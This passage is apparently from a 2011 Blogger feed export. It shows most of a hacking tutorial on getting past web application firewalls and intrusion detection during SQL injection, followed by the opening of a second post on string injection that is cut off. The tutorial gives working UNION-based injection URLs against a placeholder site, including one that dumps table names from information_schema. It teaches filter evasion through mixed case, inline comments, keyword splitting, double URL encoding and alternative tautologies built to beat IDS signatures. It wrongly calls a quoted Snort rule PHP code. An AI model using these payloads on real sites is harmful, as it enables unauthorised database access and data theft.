SEL&lt;/span&gt;&lt;span style="background-color: white; color: red; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;select&lt;/span&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;ECT&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;he will filter out those 2 red words.&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;when he did that we requested exactly the same word at the database.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;the filter is not good enough to replace that one.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;if your lucky afcource.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Another simple option.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;WAF Bypassing - Capitalization.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Some other easy methode is simply capitalizing the sql query's.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;for example instead of union UnIoN this could escape our waf easely. (in some cases)!&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;WAF Bypassing - Combining Methode's.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;We can combine this whet comments and other waf bypass methods. example:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=-1+/*!UnIoN*/+SeLeCt+1,2,3--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;combining these could get you of radar fast. but this is all basic stuff people.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;You need to learn to combine as mutch as possible.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;whitout a brain you can't WAF Bypass!&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;A full line gething tables could look like this.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;but it will probebly get mutch worce!&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=-1+/*!UnIoN*/+SeLeCT+1,2,group_concat(/*!table_name*/)+FrOM+/*information_schema*/,TaBlEs+/*!WHERE*/+/*!TaBlE_ScHeMa*/+like+database()- -&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;I also changed 2 other things here.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;changing the . to a , as i said before could pass the waf radar.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;and i changed the = at the end into like because it could also filter the = to something..&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;WAF Bypassing - using characters.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;By using a range of characters to bypass filter we could get true the waf.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;following characters can do this:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;[], ;, :, \/, $, €, |, ?, ", ', *, %, £ and lots more.&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;by using these characters in lots of cases union and select are not filtered. but the sign * is.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;which means replacing the keywords would not work. as shown before in my tutorial.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we could do this insead:&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=-1+uni*on+sel*ect+1,2,3--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;this is not mutch change from spliting the keywords.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;only here the *¨sign is filtered out. so the union+select wil be complete as soon as it is filtered.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;some others. when filtered out.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we could do (uni)(on)+(sel)(ect)&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;or using the quotes 'uni"on'+'sel"ect' this does not work whit mssql.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;WAF Bypassing - Split sql statement.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;In some cases parts of the sql statement are filtered out. for example union.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;or the select.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;This means by splitting this and only using id=-1+union+1,2,3--+- or the other way arround.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we could bypass the filter.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;WAF Bypassing - encoding characters.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;By encoding characters for example the '&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;or the white space.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;you could geth true the waf because he dous not filter encoded characters.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;IN MOST CASES THEY DO.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;this is for when you get stuck i guess.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;you could look for double encoding characters searching google. ill previeuw a fieuw here.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;single quote ' %u0027&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;open ( = %u0028&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;close ) = %u0029&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;and a white space %u0020&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;single encoding is almost always filtered by the waf. so try double.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Now we should have covered the basics.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;lets step over to Filter evasion.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: green; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;intrusion detection!&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Intrusion detection systems disable us from doing or 1=1.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we need to bypass this intrusion detection in order to check vuln.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;example of an intrusion detection system.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;alert tcp any any -&amp;gt; $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection attack”;&lt;br /&gt;flow: to_server, established; content: “' or 1=1 --”; nocase; sid: 1; rev:1;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;This is ofcource the most simple example i could give you.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;This php code sais:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;alert when he gets this or 1=1 in his http server/ http ports so he displays a message: msg: "sql injection attack":&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;thats it. but they could filter out alot more.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;lets take it easy.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;if the system sais. i cant do 1=1&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;phuh why wont i do 2=2 that simple.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;but since or and = could be filtered apart from the or 1=1&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;lets do this.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;and 2 like 2&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;that should work.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;afcource security guy wont give up.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;like does not work. then do this 1 &amp;lt; 2 this means 1 is smaller then 2. database should return true.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;unless it is filtered.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we could do 2 &amp;gt; 1 2 is bigger then 1. true.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;This is so easy its like math.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;lets doe : and 1230 - 1 like 1229&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;works 2.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;using unicode to encode your input may work 2.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;a href="http://packetstormsecurity.org/web/unicode-fun.txt" style="-webkit-background-clip: padding-box; background-color: white; color: #308cff; font-family: sans-serif; font-size: 13px; line-height: 18px; outline-color: initial; outline-style: none; outline-width: initial; text-align: center; text-decoration: none;" target="_blank"&gt;unicode cheat sheet&lt;/a&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span class="fullpost"&gt;  &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;copyright@2007 saifulfaizan&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23134681-5978886688891156130?l=www.saifulfaizan.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/23134681/posts/default/5978886688891156130'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/23134681/posts/default/5978886688891156130'/><link rel='alternate' type='text/html' href='http://www.saifulfaizan.com/2011/12/basic-waf-bypassing-and-intrusion.html' title='Basic WAF bypassing and intrusion detection'/><author><name>x-CODE-shadow</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_MmkIH6WGbYI/R4q6vasF8zI/AAAAAAAAAGY/x1TYR1MoOrE/S220/DSCI0128.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-23134681.post-2554452555892276150</id><published>2011-12-16T22:49:00.000+08:00</published><updated>2011-12-16T22:49:33.012+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Paper N Tutorial'/><title type='text'>Basic sql injection String Injection</title><content type='html'>&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;1. This tutorial.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;2. Notepad. Because, using a pen and paper would take to long.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;3. A vulnerable site.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Lets start.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: green; font-family: sans-serif; 